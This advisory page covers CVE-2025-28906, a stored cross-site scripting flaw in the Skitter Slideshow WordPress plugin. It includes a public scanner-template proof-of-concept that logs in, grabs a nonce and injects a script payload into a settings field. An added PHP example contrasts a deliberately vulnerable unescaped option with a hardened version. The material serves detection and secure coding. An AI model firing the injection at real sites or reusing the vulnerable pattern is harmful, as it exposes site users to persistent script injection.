CVE-2025-28906: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting

Date: 2025-08-01 | Affected software: Skitter Slideshow | PoC: public

Vulnerability description

The Skitter Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping.

PoC code [public]

id: CVE-2025-28906

info:
  name: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
  author: nblirwn
  severity: medium
  description: |
    The Skitter Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-skitter-slideshow/skitter-slideshow-252-authenticated-administrator-stored-cross-site-scripting
    - https://wordpress.org/plugins/wp-skitter-slideshow/
    - https://patchstack.com/database/wordpress/plugin/wp-skitter-slideshow/vulnerability/wordpress-skitter-slideshow-plugin-2-5-2-cross-site-scripting-xss-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-28906
    cwe-id: CWE-79
    epss-score: 0.01172
    epss-percentile: 0.77942
  metadata:
    verified: true
    max-request: 5
    publicwww-query: "/wp-content/plugins/wp-skitter-slideshow/"
  tags: cve,cve2025,wp-plugin,wp-skitter-slideshow,wordpress,wp,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "contains(body_1, 'wp-content/plugins/wp-skitter-slideshow/')"

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=wp_skitter_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_skitter_menu&wp_skitter_type=posts&wp_skitter_category=1&wp_skitter_slides="><script>alert(document.domain)</script>&wp_skitter_xml=&wp_skitter_theme=square&wp_skitter_animation=random&wp_skitter_type_navigation=numbers&wp_skitter_width=&wp_skitter_height=&wp_skitter_background=%23000&wp_skitter_crop=true&wp_skitter_velocity=&wp_skitter_interval=&wp_skitter_navigation=true&wp_skitter_numbers_align=left&wp_skitter_label=true&wp_skitter_label_animation=&wp_skitter_width_label=&wp_skitter_easing_default=&wp_skitter_controls_position=&wp_skitter_focus_position=&wp_skitter_with_animations=&wp_skitter_auto_play=true

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_4 == 200"
          - "contains(body_4, '<script>alert(document.domain)</script>')"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body_2
        group: 1
        internal: true
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
# digest: 4a0a00473045022050cd93356803577b4dd1a3e693647eafca728141878e5d466bcbf98a84b51979022100dfbe5632e68398373fb6f4c613577db4abb30fa019a2cea35bb0915a3f8f6d8b:922c64590222798bb761d5b6d8e72950
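The advisory attributes the bug to missing input sanitization and output escaping, and the template's payload opens with `">` to break out of an HTML attribute value. The following is an added illustration, not code from the Skitter Slideshow plugin: a settings option registered and echoed in the vulnerable way, next to the hardened form using the WordPress Settings API's `sanitize_callback` and `esc_attr()`. The `data-slides` attribute, the hook names and the assumption that `wp_skitter_slides` holds a slide count are hypothetical.

```php
<?php
// Added example, not the plugin's own code. Option group and option name
// follow the PoC request (option_page=wp_skitter_settings, wp_skitter_slides);
// everything else here is an assumption used to show the pattern.

// --- Vulnerable pattern: no sanitize_callback on save, no escaping on output ---
function skitter_vuln_register() {
    // Stored verbatim by options.php, so '"><script>...' survives intact.
    register_setting( 'wp_skitter_settings', 'wp_skitter_slides' );
}

function skitter_vuln_render() {
    $slides = get_option( 'wp_skitter_slides' );
    // A '"' inside $slides closes the attribute; the remainder is parsed as markup.
    echo '<div class="skitter" data-slides="' . $slides . '"></div>';
}

// --- Hardened pattern: sanitize on save AND escape at the output sink ---
function skitter_safe_register() {
    register_setting( 'wp_skitter_settings', 'wp_skitter_slides', array(
        'type'              => 'integer',
        'sanitize_callback' => 'absint', // assumed slide count: digits only
        'default'           => 1,
    ) );
}

function skitter_safe_render() {
    $slides = (int) get_option( 'wp_skitter_slides', 1 );
    // esc_attr() is applied even though the value was sanitized on save:
    // escaping belongs at the sink, independent of what the source promised.
    echo '<div class="skitter" data-slides="' . esc_attr( $slides ) . '"></div>';
}

add_action( 'admin_init', 'skitter_safe_register' ); // hook name assumed
add_action( 'wp_footer', 'skitter_safe_render' );     // hook name assumed
```

The same rule applies to the settings page itself: every stored option echoed back into a form field on `options-general.php` needs `esc_attr()` (or `esc_html()` for text nodes), which is what the template's final request checks for.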